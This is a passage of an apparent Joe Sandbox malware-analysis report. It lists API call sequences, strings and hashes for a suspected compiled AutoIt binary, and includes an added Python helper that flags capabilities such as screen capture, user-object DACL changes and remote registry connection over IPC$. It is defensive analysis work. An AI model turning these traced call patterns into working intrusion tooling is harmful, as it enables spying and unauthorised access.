                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00F4F15B
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F4F193
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F4F1C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1296962147-4108050209
                                                                                        • Opcode ID: 042c1531e8e86a9157f1f036cee289ca20a5b8887ae276a9f9eff713ab417780
                                                                                        • Instruction ID: d49e8d0d17ba1f91ead7b1d767505bdd1a720f74a535f07e62c2cdcfc851e7f9
                                                                                        • Opcode Fuzzy Hash: 042c1531e8e86a9157f1f036cee289ca20a5b8887ae276a9f9eff713ab417780
                                                                                        • Instruction Fuzzy Hash: 34816E71A04315AFD710CF14C884A6BBBE5FB88324F14452EFD9997291D770D909EBA2
                                                                                        APIs
                                                                                          • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F1ABD7
                                                                                          • Part of subcall function 00F1ABBB: GetLastError.KERNEL32(?,00F1A69F,?,?,?), ref: 00F1ABE1
                                                                                          • Part of subcall function 00F1ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00F1A69F,?,?,?), ref: 00F1ABF0
                                                                                          • Part of subcall function 00F1ABBB: HeapAlloc.KERNEL32(00000000,?,00F1A69F,?,?,?), ref: 00F1ABF7
                                                                                          • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F1AC0E
                                                                                          • Part of subcall function 00F1AC56: GetProcessHeap.KERNEL32(00000008,00F1A6B5,00000000,00000000,?,00F1A6B5,?), ref: 00F1AC62
                                                                                          • Part of subcall function 00F1AC56: HeapAlloc.KERNEL32(00000000,?,00F1A6B5,?), ref: 00F1AC69
                                                                                          • Part of subcall function 00F1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F1A6B5,?), ref: 00F1AC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F1A8CB
                                                                                        • _memset.LIBCMT ref: 00F1A8E0
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F1A8FF
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F1A910
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00F1A94D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F1A969
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F1A986
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F1A995
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F1A99C
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F1A9BD
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00F1A9C4
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F1A9F5
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F1AA1B
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F1AA2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: 4c1d7b4e5e7556877cc6fce2b91fa42d70b3f9e84251d9f2599f67863b584e44
                                                                                        • Instruction ID: 94cff757872f49c77fd01abaad576fb5bd7853022e4c217e40a9b73547df3366
                                                                                        • Opcode Fuzzy Hash: 4c1d7b4e5e7556877cc6fce2b91fa42d70b3f9e84251d9f2599f67863b584e44
                                                                                        • Instruction Fuzzy Hash: 7B514B71E01209BFDF10DF91DD45AEEBB79FF04310F048119E921A6290DB799A45EB61
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00F39E36
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F39E42
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00F39E4E
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00F39E5B
                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F39EAF
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00F39EEB
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F39F0F
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00F39F17
                                                                                        • DeleteObject.GDI32(?), ref: 00F39F20
                                                                                        • DeleteDC.GDI32(00000006), ref: 00F39F27
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00F39F32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 0baee9148f5f95ccb095a3febd7fc936840aef9dcb876ce248c2cf5678a2a8dc
                                                                                        • Instruction ID: 873deb0bdd160bd9dee3afbc7759941d768961ffb15910a66cbf42eb69699149
                                                                                        • Opcode Fuzzy Hash: 0baee9148f5f95ccb095a3febd7fc936840aef9dcb876ce248c2cf5678a2a8dc
                                                                                        • Instruction Fuzzy Hash: 4A514D75A04309EFDB14CFA8CC85EAEBBB9EF48720F14841DF95997210C7B5A941DB60
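The three function records above (the OleLoadPicture file loader at 00F4E754.., the GetUserObjectSecurity/AddAce/SetUserObjectSecurity routine at 00F1A8CB.. and the GetDC/StretchBlt/GetDIBits routine at 00F39E36..) are the kind of "APIs" lists an analyst reads by eye to decide what a function is for. The following Python is an added triage helper, not part of the Joe Sandbox report or of any tool it names: it parses lines in the report's own `Name.MODULE(args), ref: addr` form, matches ordered API sequences against a few hand-written capability rules, and names the well-known constants that appear in the argument slots. The sample input is copied from the records above and trimmed; the rule names, the constant table and the ordered-subsequence matching are my own choices, and "Part of subcall function" lines are kept because the DACL routine only shows GetUserObjectSecurity through its callee.

```python
import re

# Constructed sample input: API lines copied from three function records of the
# report above, in the report's own "Name.MODULE(args), ref: addr" form. The
# report prints more argument slots than the API takes (it dumps the stack) and
# "?" means the value could not be recovered from the memory dump.
SAMPLE_RECORDS = {
    "00F4E754": """\
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F4BEF4,?,?), ref: 00F4E754
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E79B
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E7BC
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00F6D9BC,?), ref: 00F4E7D5
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F4E872
""",
    "00F39E36": """\
• GetDC.USER32(00000000), ref: 00F39E36
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F39E42
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F39EAF
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00F39EEB
• ReleaseDC.USER32(00000000,?), ref: 00F39F32
""",
    "00F1A8CB": """\
  • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F1ABD7
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F1A8CB
• _memset.LIBCMT ref: 00F1A8E0
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F1A8FF
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F1A969
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F1AA2F
""",
}

# One "APIs" line; "Part of subcall function X:" marks a call the report
# attributes to a callee rather than to this function.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

def parse_arg(token):
    """'80000000' -> 0x80000000, '-00000001' -> 0xFFFFFFFF, '?' -> None."""
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]{8})", token.strip())
    if not m:
        return None
    value = int(m.group(2), 16)
    return (-value) & 0xFFFFFFFF if m.group(1) else value

def parse_record(text):
    """Parse one function's APIs list into ordered call dicts; skip headings."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            calls.append({"name": m.group("name"), "module": m.group("module"),
                          "args": [parse_arg(a) for a in raw.split(",")] if raw else [],
                          "ref": int(m.group("ref"), 16), "subcall": m.group("sub")})
    return calls

# Each rule is an ordered list of steps; a step is the set of APIs that satisfy
# it. A record matches when one API per step occurs in that order.
CAPABILITY_RULES = {
    "screen_capture": [{"GetDC", "GetWindowDC"}, {"CreateCompatibleBitmap"},
                       {"BitBlt", "StretchBlt"}, {"GetDIBits"}],
    "user_object_dacl_modification": [{"GetUserObjectSecurity"}, {"GetSecurityDescriptorDacl"},
                                      {"AddAce"}, {"SetUserObjectSecurity"}],
    "image_file_to_window": [{"CreateFileW", "CreateFileA"}, {"ReadFile"},
                             {"OleLoadPicture"}, {"SendMessageW", "SendMessageA"}],
}

def matches_in_order(names, steps):
    pos = 0
    for step in steps:
        while pos < len(names) and names[pos] not in step:
            pos += 1
        if pos == len(names):
            return False
        pos += 1
    return True

def capabilities(calls):
    names = [c["name"] for c in calls]
    return sorted(r for r, steps in CAPABILITY_RULES.items() if matches_in_order(names, steps))

# (API, zero-based parameter index per the real prototype) -> {value: name};
# the extra stack slots printed by the report are never looked at.
KNOWN_CONSTANTS = {
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ"}, ("CreateFileW", 4): {3: "OPEN_EXISTING"},
    ("StretchBlt", 10): {0x00CC0020: "SRCCOPY"}, ("SendMessageW", 1): {0x0172: "STM_SETIMAGE"},
    ("GetAclInformation", 3): {2: "AclSizeInformation"},
    ("SetUserObjectSecurity", 1): {4: "DACL_SECURITY_INFORMATION"},
}

def annotate(call):
    """'argN=NAME' for every recognised constant argument of one call."""
    return [f"arg{i}={t[call['args'][i]]}" for (api, i), t in KNOWN_CONSTANTS.items()
            if api == call["name"] and i < len(call["args"]) and call["args"][i] in t]

if __name__ == "__main__":
    for addr, text in SAMPLE_RECORDS.items():
        print(addr, capabilities(parse_record(text)) or "-")
```

Two caveats when reading the output. First, the report (see the detection list at the top of the page) says the binary is likely a compiled AutoIt script, and the `Line %d (File "%s"):` and `^ ERROR` strings in the two LoadString records below are AutoIt's own runtime error messages; the routines matched here are therefore most likely interpreter library code that is present in every compiled AutoIt binary, so a rule hit says the capability is available to the embedded script, not that the script exercised it. Second, the DACL rule fires on 00F1A8CB only through the call attributed to subcall 00F1ABBB; that GetUserObjectSecurity / AddAce / SetUserObjectSecurity shape is what code looks like when it grants another account access to a window station or desktop before starting a process under different credentials, but that is an interpretation, and the report itself only lists the calls.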
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-2391861430
                                                                                        • Opcode ID: 0c86cd1e88c0e121b029b3d6a4b879944efa8bcc8f852c5c7c7ffd5e9f5e59a1
                                                                                        • Instruction ID: aacad3e7598e2e77d58345366b5bc1aa38a9eeee9729dccb75bcf28858d661e0
                                                                                        • Opcode Fuzzy Hash: 0c86cd1e88c0e121b029b3d6a4b879944efa8bcc8f852c5c7c7ffd5e9f5e59a1
                                                                                        • Instruction Fuzzy Hash: 2351CD7280055DBACF14EBE1DD42EEEB7B8AF04304F104066F505720A2EB706F59EBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-3420473620
                                                                                        • Opcode ID: 2ab6fa1e02c9fd33997dbb6e6f06d894946b2f04ca8ee8fbaf499032c51a21db
                                                                                        • Instruction ID: 5c129be03ad96afd2d46a4300adf633829d4ebd6921b62be9333169bfe850b4e
                                                                                        • Opcode Fuzzy Hash: 2ab6fa1e02c9fd33997dbb6e6f06d894946b2f04ca8ee8fbaf499032c51a21db
                                                                                        • Instruction Fuzzy Hash: C351BE7280065DAADF15EBE0DD42EEEB7B8AF04344F104065F509720A2EB746F59EBA1
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F255D7
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F25664
                                                                                        • GetMenuItemCount.USER32(00FA1708), ref: 00F256ED
                                                                                        • DeleteMenu.USER32(00FA1708,00000005,00000000,000000F5,?,?), ref: 00F2577D
                                                                                        • DeleteMenu.USER32(00FA1708,00000004,00000000), ref: 00F25785
                                                                                        • DeleteMenu.USER32(00FA1708,00000006,00000000), ref: 00F2578D
                                                                                        • DeleteMenu.USER32(00FA1708,00000003,00000000), ref: 00F25795
                                                                                        • GetMenuItemCount.USER32(00FA1708), ref: 00F2579D
                                                                                        • SetMenuItemInfoW.USER32(00FA1708,00000004,00000000,00000030), ref: 00F257D3
                                                                                        • GetCursorPos.USER32(?), ref: 00F257DD
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00F257E6
                                                                                        • TrackPopupMenuEx.USER32(00FA1708,00000000,?,00000000,00000000,00000000), ref: 00F257F9
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F25805
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3993528054-0
                                                                                        • Opcode ID: 7209b654fc603654e5a191b2077cd79e4c53702b3ab107e3b15622cf3f530370
                                                                                        • Instruction ID: 4c0866c3c70dce34cdffe81c1ce6fea8dfb86589e1bf5d01d50cf744aa8e09a8
                                                                                        • Opcode Fuzzy Hash: 7209b654fc603654e5a191b2077cd79e4c53702b3ab107e3b15622cf3f530370
                                                                                        • Instruction Fuzzy Hash: 11711571A41629BFEB209F54EC49FAABF65FF00B64F244205F5296A1E0C7B16C10FB91
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F1A1DC
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F1A211
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F1A22D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F1A249
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F1A273
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F1A29B
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F1A2A6
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F1A2AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1687751970-22481851
                                                                                        • Opcode ID: 89a71e2139060f75c5c0f1dee7b90d454f5a17c14a865f9031b4011f22861877
                                                                                        • Instruction ID: 41f4cb3be3bf9b84e968e4a3ec9d6844921e1f7ac2cced04e0c08b263fd6f9e9
                                                                                        • Opcode Fuzzy Hash: 89a71e2139060f75c5c0f1dee7b90d454f5a17c14a865f9031b4011f22861877
                                                                                        • Instruction Fuzzy Hash: 8F410676C1126DABDF11EBA5DC85DEDB7B8BF18350F00406AE911B3160EB709E45DB90
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        • Opcode ID: ae4cf8867aaf3dc0329e1248736e285a3e356406b9ceecae8825bc0bc96ad332
                                                                                        • Instruction ID: ff825206e7cb478a20b6faba1165dc505d4fdf43276ad5f83f5f0494cd5d5950
                                                                                        • Opcode Fuzzy Hash: ae4cf8867aaf3dc0329e1248736e285a3e356406b9ceecae8825bc0bc96ad332
                                                                                        • Instruction Fuzzy Hash: F541823090028D8BEF14EF54D851AEB37B5AF62350F111824FC552B2A2EB70BE0BEB10
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F536F4,00000010,?,Bad directive syntax error,00F7DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F225D6
                                                                                        • LoadStringW.USER32(00000000,?,00F536F4,00000010), ref: 00F225DD
                                                                                        • _wprintf.LIBCMT ref: 00F22610
                                                                                        • __swprintf.LIBCMT ref: 00F22632
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F226A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1080873982-4153970271
                                                                                        • Opcode ID: a9325bf3f518946b6ffe8051437c50c5f26dd48b4ac924cb91e139070e00a627
                                                                                        • Instruction ID: 9b6812258ceb1e472c243f19b5841d05ae5392ff8b0d3c3c4927f458dd2a1c6f
                                                                                        • Opcode Fuzzy Hash: a9325bf3f518946b6ffe8051437c50c5f26dd48b4ac924cb91e139070e00a627
                                                                                        • Instruction Fuzzy Hash: DA216D3290025EBFDF11AF90CC4AEEE7B79BF18304F044455F515760A2EB71A619EB51
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F27B42
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F27B58
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F27B69
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F27B7B
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F27B8C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 890592661-1007645807
                                                                                        • Opcode ID: 3899a1f55aa606eff71eae9f783ee9f535df346b432bbf24ea8a169d4fcb4b79
                                                                                        • Instruction ID: 0d47bd6b7b4c8d06f70f37efb947cdc2e8f34928c15f8d0316d7f5363bf32b65
                                                                                        • Opcode Fuzzy Hash: 3899a1f55aa606eff71eae9f783ee9f535df346b432bbf24ea8a169d4fcb4b79
                                                                                        • Instruction Fuzzy Hash: 6211C8B1A442AD79EB20B3A2DC4ADFFBABCEBD1B10F0004157411B20C1DA605E45D6B3
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00F27794
                                                                                          • Part of subcall function 00EFDC38: timeGetTime.WINMM(?,7694B400,00F558AB), ref: 00EFDC3C
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F277C0
                                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00F277E4
                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00F27806
                                                                                        • SetActiveWindow.USER32 ref: 00F27825
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F27833
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F27852
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00F2785D
                                                                                        • IsWindow.USER32 ref: 00F27869
                                                                                        • EndDialog.USER32(00000000), ref: 00F2787A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
